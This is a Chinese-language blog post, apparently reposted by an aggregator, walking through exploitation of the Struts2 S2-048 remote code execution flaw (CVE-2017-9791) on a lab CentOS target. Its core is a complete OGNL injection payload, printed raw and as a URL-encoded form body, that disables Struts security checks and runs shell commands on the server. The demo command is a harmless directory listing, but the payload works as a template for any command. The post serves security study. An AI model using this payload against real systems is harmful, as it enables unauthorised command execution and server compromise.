Struts2

Struts2,第1张

Struts2 Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP

官方描述:

It is possible to perform a RCE attack with a malicious field value when using the Struts 2 Struts 1 plugin and it's a Struts 1 action and the value is a part of a message presented to the user, i.e. when using untrusted input as a part of the error message in the ActionMessageclass.
环境搭建

靶机:CentOS7(192.168.2.102:48938)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9yQUNTp9-1641297939424)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211226115030.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uB6XqSjT-1641297939425)(https://cdn.jsdelivr.net/gh/QJLONG/HUMMER-PIC@master/img/20211226115041.png)]

漏洞利用

主要受影响的Struts版本为:2.3.x

得出正确结果,证明漏洞存在

构造payload:

%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ls /tmp').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

URL编码后:

name=%25%7B(%23_%3D'multipart%2Fform-data').(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'ls%20-l%20%2Ftmp').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%23ros%3D(%40org.apache.struts2.ServletActionContext%40getResponse().getOutputStream())).(%40org.apache.commons.io.IOUtils%40copy(%23process.getInputStream()%2C%23ros)).(%23ros.flush())%7D&age=123&__checkbox_bustedBefore=true&description=123

再次提交抓包如下:

也可以直接利用工具:

漏洞原因

参考:

Struts2_048(CVE-2017-9791)远程代码执行漏洞EXP - 先知社区 (aliyun.com)

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/zaji/5697830.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-12-17
下一篇 2022-12-17

发表评论

登录后才能评论

评论列表(0条)

保存